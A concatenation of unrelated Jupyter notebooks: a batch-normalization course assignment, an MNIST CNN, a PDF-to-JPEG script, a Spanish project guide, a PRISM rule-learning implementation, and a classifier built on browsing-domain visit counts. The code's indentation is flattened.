bn_param = {'mode': 'train'}
fx = lambda x: batchnorm_forward(x, gamma, beta, bn_param)[0]
fg = lambda a: batchnorm_forward(x, a, beta, bn_param)[0]
fb = lambda b: batchnorm_forward(x, gamma, b, bn_param)[0]
dx_num = eval_numerical_gradient_array(fx, x, dout)
da_num = eval_numerical_gradient_array(fg, gamma.copy(), dout)
db_num = eval_numerical_gradient_array(fb, beta.copy(), dout)
_, cache = batchnorm_forward(x, gamma, beta, bn_param)
dx, dgamma, dbeta = batchnorm_backward(dout, cache)
print('dx error: ', rel_error(dx_num, dx))
print('dgamma error: ', rel_error(da_num, dgamma))
print('dbeta error: ', rel_error(db_num, dbeta))
# -
# ## Batch Normalization: alternative backward (OPTIONAL, +3 points extra credit)
# In class we talked about two different implementations for the sigmoid backward pass. One strategy is to write out a computation graph composed of simple operations and backprop through all intermediate values. Another strategy is to work out the derivatives on paper. For the sigmoid function, it turns out that you can derive a very simple formula for the backward pass by simplifying gradients on paper.
#
# Surprisingly, it turns out that you can also derive a simple expression for the batch normalization backward pass if you work out derivatives on paper and simplify. After doing so, implement the simplified batch normalization backward pass in the function `batchnorm_backward_alt` and compare the two implementations by running the following. Your two implementations should compute nearly identical results, but the alternative implementation should be a bit faster.
#
# NOTE: This part of the assignment is entirely optional, but we will reward 3 points of extra credit if you can complete it.
# +
np.random.seed(231)
N, D = 500, 5000
x = 5 * np.random.randn(N, D) + 12
gamma = np.random.randn(D)
beta = np.random.randn(D)
dout = np.random.randn(N, D)
bn_param = {'mode': 'train'}
out, cache = batchnorm_forward(x, gamma, beta, bn_param)
t1 = time.time()
dx1, dgamma1, dbeta1 = batchnorm_backward(dout, cache)
t2 = time.time()
dx2, dgamma2, dbeta2 = batchnorm_backward_alt(dout, cache)
t3 = time.time()
print('dx difference: ', rel_error(dx1, dx2))
print('dgamma difference: ', rel_error(dgamma1, dgamma2))
print('dbeta difference: ', rel_error(dbeta1, dbeta2))
print('speedup: %.2fx' % ((t2 - t1) / (t3 - t2)))
# -
# ## Fully Connected Nets with Batch Normalization
# Now that you have a working implementation for batch normalization, go back to your `FullyConnectedNet` in the file `cs2312n/classifiers/fc_net.py`. Modify your implementation to add batch normalization.
#
# Concretely, when the flag `use_batchnorm` is `True` in the constructor, you should insert a batch normalization layer before each ReLU nonlinearity. The outputs from the last layer of the network should not be normalized. Once you are done, run the following to gradient-check your implementation.
#
# HINT: You might find it useful to define an additional helper layer similar to those in the file `cs231n/layer_utils.py`. If you decide to do so, do it in the file `cs231n/classifiers/fc_net.py`.
# +
np.random.seed(231)
N, D, H1, H2, C = 2, 15, 20, 30, 10
X = np.random.randn(N, D)
y = np.random.randint(C, size=(N,))
for reg in [0, 3.14]:
print('Running check with reg = ', reg)
model = FullyConnectedNet([H1, H2], input_dim=D, num_classes=C,
reg=reg, weight_scale=5e-2, dtype=np.float64,
use_batchnorm=True)
loss, grads = model.loss(X, y)
print('Initial loss: ', loss)
for name in sorted(grads):
f = lambda _: model.loss(X, y)[0]
grad_num = eval_numerical_gradient(f, model.params[name], verbose=False, h=1e-5)
print('%s relative error: %.2e' % (name, rel_error(grad_num, grads[name])))
if reg == 0: print()
# -
# # Batchnorm for deep networks
# Run the following to train a six-layer network on a subset of 1000 training examples both with and without batch normalization.
# +
np.random.seed(231)
# Try training a very deep net with batchnorm
hidden_dims = [100, 100, 100, 100, 100]
num_train = 1000
small_data = {
'X_train': data['X_train'][:num_train],
'y_train': data['y_train'][:num_train],
'X_val': data['X_val'],
'y_val': data['y_val'],
}
weight_scale = 2e-2
bn_model = FullyConnectedNet(hidden_dims, weight_scale=weight_scale, use_batchnorm=True)
model = FullyConnectedNet(hidden_dims, weight_scale=weight_scale, use_batchnorm=False)
bn_solver = Solver(bn_model, small_data,
num_epochs=10, batch_size=50,
update_rule='adam',
optim_config={
'learning_rate': 1e-3,
},
verbose=True, print_every=200)
bn_solver.train()
solver = Solver(model, small_data,
num_epochs=10, batch_size=50,
update_rule='adam',
optim_config={
'learning_rate': 1e-3,
},
verbose=True, print_every=200)
solver.train()
# -
# Run the following to visualize the results from two networks trained above. You should find that using batch normalization helps the network to converge much faster.
# +
plt.subplot(3, 1, 1)
plt.title('Training loss')
plt.xlabel('Iteration')
plt.subplot(3, 1, 2)
plt.title('Training accuracy')
plt.xlabel('Epoch')
plt.subplot(3, 1, 3)
plt.title('Validation accuracy')
plt.xlabel('Epoch')
plt.subplot(3, 1, 1)
plt.plot(solver.loss_history, 'o', label='baseline')
plt.plot(bn_solver.loss_history, 'o', label='batchnorm')
plt.subplot(3, 1, 2)
plt.plot(solver.train_acc_history, '-o', label='baseline')
plt.plot(bn_solver.train_acc_history, '-o', label='batchnorm')
plt.subplot(3, 1, 3)
plt.plot(solver.val_acc_history, '-o', label='baseline')
plt.plot(bn_solver.val_acc_history, '-o', label='batchnorm')
for i in [1, 2, 3]:
plt.subplot(3, 1, i)
plt.legend(loc='upper center', ncol=4)
plt.gcf().set_size_inches(15, 15)
plt.show()
# -
# # Batch normalization and initialization
# We will now run a small experiment to study the interaction of batch normalization and weight initialization.
#
# The first cell will train 8-layer networks both with and without batch normalization using different scales for weight initialization. The second layer will plot training accuracy, validation set accuracy, and training loss as a function of the weight initialization scale.
# +
np.random.seed(231)
# Try training a very deep net with batchnorm
hidden_dims = [50, 50, 50, 50, 50, 50, 50]
num_train = 1000
small_data = {
'X_train': data['X_train'][:num_train],
'y_train': data['y_train'][:num_train],
'X_val': data['X_val'],
'y_val': data['y_val'],
}
bn_solvers = {}
solvers = {}
weight_scales = np.logspace(-4, 0, num=20)
for i, weight_scale in enumerate(weight_scales):
print('Running weight scale %d / %d' % (i + 1, len(weight_scales)))
bn_model = FullyConnectedNet(hidden_dims, weight_scale=weight_scale, use_batchnorm=True)
model = FullyConnectedNet(hidden_dims, weight_scale=weight_scale, use_batchnorm=False)
bn_solver = Solver(bn_model, small_data,
num_epochs=10, batch_size=50,
update_rule='adam',
optim_config={
'learning_rate': 1e-3,
},
verbose=False, print_every=200)
bn_solver.train()
bn_solvers[weight_scale] = bn_solver
solver = Solver(model, small_data,
num_epochs=10, batch_size=50,
update_rule='adam',
optim_config={
'learning_rate': 1e-3,
},
verbose=False, print_every=200)
solver.train()
solvers[weight_scale] = solver
# +
# Plot results of weight scale experiment
best_train_accs, bn_best_train_accs = [], []
best_val_accs, bn_best_val_accs = [], []
final_train_loss, bn_final_train_loss = [], []
for ws in weight_scales:
best_train_accs.append(max(solvers[ws].train_acc_history))
bn_best_train_accs.append(max(bn_solvers[ws].train_acc_history))
best_val_accs.append(max(solvers[ws].val_acc_history))
bn_best_val_accs.append(max(bn_solvers[ws].val_acc_history))
final_train_loss.append(np.mean(solvers[ws].loss_history[-100:]))
bn_final_train_loss.append(np.mean(bn_solvers[ws].loss_history[-100:]))
plt.subplot(3, 1, 1)
plt.title('Best val accuracy vs weight initialization scale')
plt.xlabel('Weight initialization scale')
plt.ylabel('Best val accuracy')
plt.semilogx(weight_scales, best_val_accs, '-o', label='baseline')
plt.semilogx(weight_scales, bn_best_val_accs, '-o', label='batchnorm')
plt.legend(ncol=2, loc='lower right')
plt.subplot(3, 1, 2)
plt.title('Best train accuracy vs weight initialization scale')
plt.xlabel('Weight initialization scale')
plt.ylabel('Best training accuracy')
plt.semilogx(weight_scales, best_train_accs, '-o', label='baseline')
plt.semilogx(weight_scales, bn_best_train_accs, '-o', label='batchnorm')
plt.legend()
plt.subplot(3, 1, 3)
plt.title('Final training loss vs weight initialization scale')
plt.xlabel('Weight initialization scale')
plt.ylabel('Final training loss')
plt.semilogx(weight_scales, final_train_loss, '-o', label='baseline')
plt.semilogx(weight_scales, bn_final_train_loss, '-o', label='batchnorm')
plt.legend()
plt.gca().set_ylim(1.0, 3.5)
plt.gcf().set_size_inches(10, 15)
plt.show()
# -
# # Question:
# Describe the results of this experiment, and try to give a reason why the experiment gave the results that it did.
# # Answer:
#
|
assignment2/BatchNormalization_2017.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
# Imports
# + pycharm={"name": "#%%\n"}
import tensorflow as tf
import numpy as np
from tensorflow.keras import datasets, layers, models, losses, regularizers
import matplotlib.pyplot as plt
# -
# Load mnist and reshape
# + pycharm={"name": "#%%\n"}
mnist = datasets.mnist
(x_train, y_train), (x_test, y_test) = mnist.load_data()
x_train, x_test = x_train / 255.0, x_test / 255.0
x_train = x_train.reshape(len(x_train), 28, 28, 1)
x_test = x_test.reshape(len(x_test), 28, 28, 1)
# + [markdown] pycharm={"name": "#%% md\n"}
# Reduce train data
#
#
# + pycharm={"name": "#%%\n"}
max_per_class = 10
counter = {}
min_x_train = []
min_y_train = []
for i in range(len(y_train)):
if y_train[i] not in counter:
counter[y_train[i]] = 0
if counter[y_train[i]] == max_per_class:
continue
min_x_train.append(x_train[i])
min_y_train.append(y_train[i])
counter[y_train[i]] += 1
x_train = np.array(min_x_train)
y_train = np.array(min_y_train)
# -
# Create model
# + pycharm={"name": "#%%\n"}
model = models.Sequential()
model.add(layers.Conv2D(32, kernel_size=(3, 3), strides=(1,1), activation='relu', input_shape=(28, 28, 1), kernel_regularizer=regularizers.l2(0.001)))
model.add(layers.Dropout(0.3))
model.add(layers.MaxPool2D((2, 2)))
model.add(layers.Conv2D(64, (3, 3), activation='relu', kernel_regularizer=regularizers.l2(0.003)))
model.add(layers.Dropout(0.5))
model.add(layers.MaxPool2D((2, 2)))
model.add(layers.Conv2D(64, (3, 3), activation='relu', kernel_regularizer=regularizers.l2(0.003)))
model.add(layers.Dropout(0.9))
model.add(layers.Flatten())
model.add(layers.Dense(64, activation='relu', kernel_regularizer=regularizers.l2(0.001)))
model.add(layers.Dropout(0.5))
model.add(layers.Dense(10, kernel_regularizer=regularizers.l2(0.002)))
model.summary()
model.compile(optimizer='adam',
loss=losses.SparseCategoricalCrossentropy(from_logits=True),
metrics=['accuracy'])
# -
# Train
# + pycharm={"name": "#%%\n"}
history = model.fit(x_train, y_train, epochs=400, validation_data=(x_test, y_test))
# -
# View results and training progression
# + pycharm={"name": "#%%\n"}
train_loss, train_acc = model.evaluate(x_train, y_train, verbose=2)
print('Train stats:', train_loss, train_acc)
test_loss, test_acc = model.evaluate(x_test, y_test, verbose=2)
print('Test stats:', test_loss, test_acc)
# +
plt.plot(history.history['accuracy'], label='accuracy')
plt.plot(history.history['val_accuracy'], label='val_accuracy')
plt.xlabel('Epoch')
plt.ylabel('Accuracy')
plt.ylim([0.5, 1])
plt.legend(loc='lower right')
train_loss, train_acc = model.evaluate(x_train, y_train, verbose=2)
print('Train stats:', train_loss, train_acc)
test_loss, test_acc = model.evaluate(x_test, y_test, verbose=2)
print('Test stats:', test_loss, test_acc)
# -
print(history.history.keys())
|
cnn/10_cnn_proc_83_test.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# import module
from pdf2image import convert_from_path
import glob
import tqdm
import os
# +
files = glob.glob('/cndd2/fangming/projects/scf_enhancers/figures/figureshic_map*.pdf')
print(files)
# +
# Store Pdf with convert_from_path function
for file in tqdm.tqdm(files):
images = convert_from_path(file)
for i, img in enumerate(images):
output = "{}_{}.jpg".format(file.replace('.pdf', ''), i)
print(output)
img.save(output, 'JPEG')
# -
|
archives/hic/try_pdf_to_jpg.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# <img style="float: right; margin: 0px 0px 15px 15px;" src="https://upload.wikimedia.org/wikipedia/commons/b/b6/Proyecto_en_construccion.jpg" width="300px" height="100px" />
#
#
# # Guía para presentación de proyectos.
# > Se especifican los componentes básicos que deberá tener cada proyecto. El proyecto debe ser un problema que se pueda modelar con las herramientas vistas en el módulo. En el caso del primer módulo, optimización.
# ___
# ## 1. Entregable.
# Los trabajos deben tener los siguientes componentes básicos.
#
# ### 1.1 Título del trabajo.
# > Debe describir el trabajo.
#
# ### 1.2 Objetivos.
# > - Se refieren a los propósitos por los cuales se hace el trabajo.
# > - Deben ser concretos, evaluables y verificables.
# > - Deben ser escritos en infinitivo.
# > #### 1.1 Objetivo general.
# > - Fin último de estudio. Se formula atendiendo el propósito global del trabajo. No presenta detalles.
# > - Se orienta a la totalidad del trabajo. Tiene que ver con el título del trabajo.
# > #### 1.2 Objetivos específicos
# > - De forma detallada describen cada una de los componentes del trabajo.
# > - En conjunto garantizan la consecución del objetivo general.
#
# Referencia:
# - https://es.slideshare.net/rosbur/metodologia-objetivos-generales-y-especficos
#
# ### 1.3 Modelo que representa el problema.
# > - Se debe incluir las ecuaciones que rigen el sistema que se está estudiando.
# > - Deducción del modelo. Explicación detallada de las ecuaciones de acuerdo al problema que se quiera resolver o modelo que se quiera representar.
# > - ¿Qué situación representa el modelo? ¿Cuáles son las limitaciones fundamentales?
# > - Significado y valor de los parámetros (constantes que aparezcan en el modelo).
#
# ### 1.4 Solución del problema.
# > - Se debe resolver el problema.
# > - ¿Condujo el algoritmo a una solución factible?
#
# ### 1.5 Visualización de la solución del problema.
# > Se deben mostrar gráficas y/o tablas que ilustren de forma adecuada los resultados. No olviden etiquetar los ejes y si se tienen varias curvas en una sola gráfica también etiquetarlas (ojo: que las curvas se puedan diferenciar con colores y estilos de línea).
#
# ### 1.6 Conclusiones.
# > Mucho cuidado, las conclusiones no son cualquier cosa. Se debe concluir respecto a los objetivos planteados de acuerdo a los resultados obtenidos.
#
# ### 1.7 Referencias.
# > Citar (en formato APA) la bibliografía utilizada.
# ___
# ## 2. Especificaciones adicionales.
# En el grupo deben haber mínimo dos integrantes y máximo tres integrantes. Para propósitos logísticos nada más, por favor enumérense como *integrante 1*, *integrante 2* e *integrante 3*.
#
# ### 2.1 Notebook de jupyter.
# > Los anteriores numerales los deben desarrollar todos en un notebook de jupyter y llamarlo de la siguiente manera `ProyectoModulo1_ApellidoN1_ApellidoN2_ApellidoN3`, donde `ApellidoNi` hace referencia al apellido materno y la inicial del primer nombre del integrante `i`.
#
# ### 2.2 Presentación.
# > Recuerden que la nota del proyecto es mitad el trabajo, y mitad la presentación. Deben hacer una presentación en power point para presentar el trabajo en la clase del lunes 29 de Abril. La presentación, además de llevar todos los componentes básicos descritos en el entregable, debe llevar una tabla de contenido.
# > - **NO DEBE TENER CÓDIGO, PARA ESO ES EL INFORME EN EL NOTEBOOK**
# > - Presentación: 10 minutos.
# > - Seguir estas recomendaciones: https://es.slideshare.net/MeireComputacion/power-point-pautas-para-una-buen-trabajo
# <script>
# $(document).ready(function(){
# $('div.prompt').hide();
# $('div.back-to-top').hide();
# $('nav#menubar').hide();
# $('.breadcrumb').hide();
# $('.hidden-print').hide();
# });
# </script>
#
# <footer id="attribution" style="float:right; color:#808080; background:#fff;">
# Created with Jupyter by <NAME>.
# </footer>
|
Modulo2/GuiaProyecto.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import numpy as np
import pandas as pd
import math
# -
#
# Each Rule consists of antecedent (Left Hand Side) and consequent (Right Hand Side). The LHS includes multiple conditions joined with AND, and RHS is a class label. The Rule also needs to store its accuracy and coverage. Finally the store a list of indexes that the rule covers.
class Rule:
def __init__(self, class_label):
self.conditions = [] # list of conditions
self.class_label = class_label # rule class
self.accuracy = 0
self.coverage = 0
self.coverage_list =[] # indexes of the rows this rule covers
def addCondition(self, condition):
self.conditions.append(condition)
def setParams(self, accuracy, coverage, coverage_list):
self.accuracy = accuracy
self.coverage = coverage
self.coverage_list = coverage_list
# Human-readable printing of this Rule
def __repr__(self):
return "If {} then {}. Coverage:{}, accuracy: {}".format(self.conditions, self.class_label,
self.coverage, self.accuracy)
# The list of conditions contains several objects of class _Condition_.
#
# Each condition includes the _attribute name_ its _value_ and a list of indexes _all_ for all rows that have that value.
#
# If the _value_ is numeric, then the condition also includes an additional field `true_false` which means the following:
# - *if true_false == True then values are >= value*
# - *if true_false == False then values are < value*
# - If *true_false is None*, then this condition is simply of form *categorical attribute = value*.
# +
class Condition:
def __init__(self, attribute, value, all, true_false=None):
self.attribute = attribute
self.value = value
self.all = all # index of all rows that have this attributes value.
self.true_false = true_false
def __repr__(self):
if self.true_false is None:
return "{}={}".format(self.attribute, self.value)
else:
return "{}>={}:{}".format(self.attribute, self.value, self.true_false)
# -
# First we call the _parse_ function to get some necessary information out of our data. _parse_ accepts a dataframe and process the data to get back a dataframe with only the unique values.
# It also returns the name of all the attribute columns and the class name.
# +
def parse(data):
# probobly a better way to do this check https://stackoverflow.com/questions/54196959/is-there-any-faster-alternative-to-col-drop-duplicates
new_df = []
[new_df.append(pd.DataFrame(data[i].unique(), columns=[i])) for i in data.columns]
new_df = pd.concat(new_df, axis=1)
columns_list = data.columns.to_numpy().tolist()
class_name = columns_list.pop(-1)
return (new_df,columns_list, class_name)
# -
# We use this function to decide if one rule is better than another,
# and update a list of rules based on the result. The function accepts two rules and a list of rules.
# It then compares the accuracy and coverage of the rules as follows:
# if rule one has better accuracy or equal accuracy and better coverage then rule two,
# it updates the list to only hold rule one. If they are equal in accuracy and coverage, then
# it appends rule one to the list of rules. Finally if rule one is worse then rule two, it dosnt do anything.
# _compare_ then returns the updated list of rules
# +
def compare(rule1, rule2, rule_list):
if rule1.accuracy > rule2.accuracy:
rule2 = rule1
rule_list = [rule2]
elif rule1.accuracy == rule2.accuracy:
if rule1.coverage > rule2.coverage:
rule2 = rule1
rule_list = [rule2]
elif rule1.coverage == rule2.coverage:
rule_list.append(rule1)
return rule_list
# -
# We use this function to hard copy one rule to another.
# It accepts the rule to copy from, an empty rule,
# and the number of conditions the rule has. It then returns the new rule with the data of the old rule.
#
def Copy(x, rule, i ):
rule.class_label = x.class_label
for j in range(i+1):
attribute = x.conditions[j].attribute
value = x.conditions[j].value
all = x.conditions[j].all
true_false = x.conditions[j].true_false
temp = Condition(attribute, value, all, true_false)
rule.addCondition(temp)
rule.accuracy =x.accuracy
rule.coverage = x.coverage
rule.coverage_list = x.coverage_list
return rule
# Helper function that creates a new rule for a new condtion.
# It accepts a rule to start from, a dataframe of rows covered by the new condition,
# a dataframe of all rows with the given attribute value, the attribute, the attribute value,
# the least amount of covrege allowed, the class label for when x is empty, and the number of conditions
# the new rule should have. It then creates a rule from all these values and returns it. If the rule goes
# bellow min_coverage it returns None.
# +
def makeRule(x, subset, all_subset, truefalse, attribute, value, min_coverage, class_label = None, i = 0):
numCount = len(subset)
denCount = len(all_subset)
if denCount == 0 or numCount < min_coverage:
return None
temp_coverage_list = np.array(subset.index)
if x != None:
temp_rule = Rule(None)
temp_rule = Copy(x, temp_rule, i)
else:
temp_rule = Rule(class_label)
temp_cond = Condition(attribute, value, np.array(all_subset.index), truefalse)
temp_rule.addCondition(temp_cond)
temp_rule.accuracy = numCount / denCount
temp_rule.coverage = numCount
temp_rule.coverage_list = temp_coverage_list
return temp_rule
# -
# Once we have our best rules with one condition that has accuracy less then one,
# we use this function to refine the rules as much as possible, and return the best one.
#
# The function works by running a loop that finds the best possible conditions to add in order to increase accuracy.
# Every itiration of the loop adds a new condition, and it only stops if either we reached accuracy one,
# or we didn't add any conditions in an itiration.
#
# The function accepts the data, names of the column attributes, list of rules we want to refine,
# data frame with all the unique attribute values, the class name, and the minimum coverage.
# And returns the first of the best rules we have.
#
# +
def refine_rule(data, column_list, rule_list, un_data, class_name, min_coverage ):
count = 0
while(True):
count+=1
temp = Rule(None)
temp.accuracy = -math.inf
temp.coverage = -math.inf
real_best_rules = [temp]
for x in rule_list:
# This temporarily gets rid of all rows that don't have the attributes of the first conditions.
new_df = data[data.index.isin(x.conditions[count - 1].all)]
if len(new_df.index) >= min_coverage:
Sbest_rules = x
best_rules = [Sbest_rules]
for y in column_list:
for z in un_data[y]:
flag = False
if pd.isnull(z):
continue
#Special cases for if the value is numeric
if isinstance(z, int) or isinstance(z, float):
flag = True
subset = new_df[(new_df[y] >= z) & (new_df[class_name] == x)]
all_subset = new_df[new_df[y] >= z]
truefalse = True
else:
subset = new_df[( new_df[y] == z) & ( new_df[class_name] == x.class_label)]
all_subset = new_df[ new_df[y] == z]
truefalse = None
temp_rule = makeRule(x, subset, all_subset, truefalse, y, z, min_coverage, None, count - 1)
if temp_rule != None:
best_rules = compare(temp_rule, Sbest_rules, best_rules)
Sbest_rules = best_rules[0]
if flag:
subset = new_df[(new_df[y] < z) & (new_df[class_name] == x)]
all_subset = new_df[new_df[y] < z]
temp_rule = makeRule(x, subset, all_subset, False, y, z, min_coverage, None, count - 1)
if temp_rule != None:
best_rules = compare(temp_rule, Sbest_rules, best_rules)
Sbest_rules = best_rules[0]
real_best_rules = compare(best_rules[0], real_best_rules[0], real_best_rules)
if real_best_rules[0].accuracy == 1 or rule_list[0] == real_best_rules[0]:
return real_best_rules[0]
if real_best_rules[0].class_label == None:
return rule_list[0]
rule_list = real_best_rules
# -
# This function implements the algorithm to find the best rule from a given dataset. It works by itirating over all possable classes and attributes to find the combination with the best accuracy and coverage for only one condition.
# Then if the rule does not have accuracy one, it calss _refine_rule_ to add on conditions and get the best possable rule.
#
# The function accepts the data, a dataframe with all the unique attributes,
# the class name, the minumum allowed accuracy and coverage, and the class attributes we care about.
#
# If the resulting rule has the minimum accuracy and coverage, it returns the rule,
# if not it returns None.
# +
def find_one_rule(data, un_data, columns_list, class_name, min_accuracy, min_coverage ,classAtt = []):
class_list = un_data[class_name].to_numpy().tolist()
if classAtt == []:
classAtt = class_list
Sbest_rules = Rule(None)
Sbest_rules.accuracy = -math.inf
Sbest_rules.coverage = -math.inf
best_rules = [Sbest_rules]
for x in classAtt:
for y in columns_list:
for z in un_data[y]:
flag = False
if pd.isnull(z):
continue
if isinstance(z, int) or isinstance(z, float):
flag = True
subset = data[(data[y] >= z) & (data[class_name] == x)]
all_subset = data[data[y] >= z]
truefalse = True
else:
subset = data[(data[y] == z) & (data[class_name] == x)]
all_subset = data[data[y] == z]
truefalse = None
temp_rule = makeRule(None, subset, all_subset, truefalse, y, z, min_coverage, x)
if temp_rule != None:
best_rules = compare(temp_rule, Sbest_rules, best_rules)
Sbest_rules = best_rules[0]
if flag:
subset = data[(data[y] < z) & (data[class_name] == x)]
all_subset = data[data[y] < z]
temp_rule = makeRule(None, subset, all_subset, False, y, z, min_coverage, x)
if temp_rule != None:
best_rules = compare(temp_rule, Sbest_rules, best_rules)
Sbest_rules = best_rules[0]
if best_rules[0].accuracy == 1 and best_rules[0].coverage >= min_coverage:
return best_rules[0]
rule = refine_rule(data, columns_list, best_rules, un_data, class_name, min_coverage)
if rule.accuracy >= min_accuracy and rule.coverage >= min_coverage:
return rule
return None
# -
# We call this function to actually find all the rules for a given dataset. _find_rules_ uses a loop to call _find_one_rule_ and get a single rule. After each rule that it gets it removes all the rows covered by that rule from the dataset. The loop continues to do this until either the dataset is empty or there are no more rules to find which happens when _find_one_rule_ returns None.
#
# The function accepts the data, a dataframe of unique attributes, the name of all attribute columns,
# ,the class name, the class atrributes we care about, and the minimum accuracy and coverage.
#
# It returns a list with all the rules it can find.
def find_rules(data, un_data, columns_list, class_name, classAtt = [], min_accuracy = 1, min_coverage = 1):
rule_list = []
temp = Rule(None)
flag = 1
while(flag):
temp = find_one_rule(data, un_data, columns_list, class_name, min_accuracy, min_coverage , classAtt)
if temp == None:
break
rule_list.append(temp)
data = data[~data.index.isin(temp.coverage_list)]
if data.empty:
flag = 0
return rule_list
# +
data_file = "contact_lenses.csv"
data = pd.read_csv(data_file)
data.drop(["id"], axis = 1, inplace = True)
data.columns
conditions = [ data['lenses type'].eq(1), data['lenses type'].eq(2), data['lenses type'].eq(3)]
choices = ["hard","soft","none"]
data['lenses type'] = np.select(conditions, choices)
# age groups
conditions = [ data['age'].eq(1), data['age'].eq(2), data['age'].eq(3)]
choices = ["young","medium","old"]
data['age'] = np.select(conditions, choices)
# spectacles
conditions = [ data['spectacles'].eq(1), data['spectacles'].eq(2)]
choices = ["nearsighted","farsighted"]
data['spectacles'] = np.select(conditions, choices)
# astigmatism
conditions = [ data['astigmatism'].eq(1), data['astigmatism'].eq(2)]
choices = ["no","yes"]
data['astigmatism'] = np.select(conditions, choices)
# tear production rate
conditions = [ data['tear production rate'].eq(1), data['tear production rate'].eq(2)]
choices = ["reduced","normal"]
data['tear production rate'] = np.select(conditions, choices)
class_labels = []
rule_list = []
min_accuracy = 1
min_coverage = 1
(unique, columns_list, class_name) = parse(data)
rule_list = find_rules(data, unique, columns_list, class_name, class_labels, min_accuracy, min_coverage )
for x in rule_list:
print(x, "\n")
# -
|
PRiSM_algorithm.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import csv
import lzstring
from collections import namedtuple, Counter
import json
from memoize import memoize
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.neighbors import KNeighborsClassifier
# +
# [num unique urls, num unique urls typed, total visits, total typed, first visit time, last visit time]
domaininfo = namedtuple('domaininfo', ['num_unique_urls', 'num_unique_urls_typed', 'total_visits', 'total_typed', 'first_visit_time', 'last_visit_time'])
decompressFromEncodedURIComponent = lzstring.LZString().decompressFromEncodedURIComponent
#filepath = 'difficultyselectionexp_may31_11am.csv'
filepath = 'difficultyselectionexp_june25_9pm.csv'
reader = csv.DictReader(open(filepath))
def extract_domain_visit_info(domain_visit_info_compressed):
domain_visit_info = json.loads(decompressFromEncodedURIComponent(domain_visit_info_compressed))
output = {}
for k,v in domain_visit_info.items():
linedata = domaininfo(*v)
output[k] = linedata
return output
alldata = []
for alldata_item in reader:
if alldata_item['selected_difficulty'] not in ['nothing', 'easy', 'medium', 'hard']:
continue
if alldata_item['domain_visit_info_compressed'] == None or len(alldata_item['domain_visit_info_compressed']) == 0:
continue
alldata_item['domain_visit_info'] = extract_domain_visit_info(alldata_item['domain_visit_info_compressed'])
alldata.append(alldata_item)
# -
training_data = alldata[:round(len(alldata)*0.8)]
test_data = alldata[round(len(alldata)*0.8):]
print(len(training_data))
print(len(test_data))
# +
def extract_labels_alldata(data):
return np.array([line['selected_difficulty'] for line in data])
@memoize
def get_most_common_label():
label_to_count = Counter()
for line in training_data:
label = line['selected_difficulty']
label_to_count[label] += 1
sorted_by_count = sorted(label_to_count.items(), key=lambda x: x[1], reverse=True)
return sorted_by_count[0][0]
@memoize
def get_most_visited_domains():
domain_to_num_visits = Counter()
for line in training_data:
domain_visit_info = line['domain_visit_info']
for domain,info in domain_visit_info.items():
domain_to_num_visits[domain] += info.total_visits
sorted_by_num_visits = sorted(domain_to_num_visits.items(), key=lambda x: x[1], reverse=True)
return [x[0] for x in sorted_by_num_visits[:100]]
@memoize
def get_most_common_domains():
domain_to_num_visits = Counter()
for line in training_data:
domain_visit_info = line['domain_visit_info']
for domain,info in domain_visit_info.items():
domain_to_num_visits[domain] += 1
sorted_by_num_visits = sorted(domain_to_num_visits.items(), key=lambda x: x[1], reverse=True)
return [x[0] for x in sorted_by_num_visits[:100]]
def get_num_visits_for_domain(domain_visit_info, domain):
info = domain_visit_info.get(domain, None)
if info != None:
return info.total_visits
return 0
def extract_features_for_user(domain_visit_info):
domains = get_most_common_domains()
visits_for_domains = np.array([get_num_visits_for_domain(domain_visit_info, x) for x in domains])
visits_for_domains = np.divide(visits_for_domains, np.sum(visits_for_domains))
return visits_for_domains
def extract_features_alldata(data):
output = []
for line in data:
domain_visit_info = line['domain_visit_info']
features = extract_features_for_user(domain_visit_info)
output.append(features)
return np.array(output)
# +
def get_percent_correct(predicted_labels, actual_labels):
if len(predicted_labels) != len(actual_labels):
raise 'need predicted and actual labels to have same lengths'
total = len(actual_labels)
correct = 0
for p,a in zip(predicted_labels, actual_labels):
if p == a:
correct += 1
return correct / total
def test_baseline_classifier():
most_common_label = get_most_common_label()
predictions = [most_common_label for line in test_data]
actual = extract_labels_alldata(test_data)
percent_correct = get_percent_correct(predictions, actual)
print('baseline classifier accuracy:', percent_correct)
def test_classifier(clf, str=None):
actual = extract_labels_alldata(test_data)
features_test = extract_features_alldata(test_data)
predictions = clf.predict(features_test)
percent_correct = get_percent_correct(predictions, actual)
print(str + ' classifier testing accuracy:', percent_correct)
def training_error_classifier(clf, str=None):
actual = extract_labels_alldata(training_data)
features_train = extract_features_alldata(training_data)
predictions = clf.predict(features_train)
percent_correct = get_percent_correct(predictions, actual)
print(str + ' classifier training accuracy:', round(percent_correct, 2))
def to_int_categorical(dt):
# {'easy', 'hard', 'medium', 'nothing'}
cat_dt = []
for item in dt:
if item == 'nothing':
cat_dt.append(0)
elif item == 'easy':
cat_dt.append(1)
elif item == 'medium':
cat_dt.append(2)
else:
cat_dt.append(3)
return np.array(cat_dt)
test_baseline_classifier()
# +
labels_train = extract_labels_alldata(training_data)
features_train = extract_features_alldata(training_data)
clf = RandomForestClassifier(max_depth=10, random_state=0)
clf.fit(features_train, labels_train)
test_classifier(clf, 'RF')
clf = KNeighborsClassifier(n_neighbors=3, p=1)
clf.fit(features_train, labels_train)
test_classifier(clf, 'KNN')
# +
import keras
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation
from keras.optimizers import SGD
from keras.utils import to_categorical
labels_test = to_categorical(to_int_categorical(extract_labels_alldata(test_data)), num_classes=4)
features_test = extract_features_alldata(test_data)
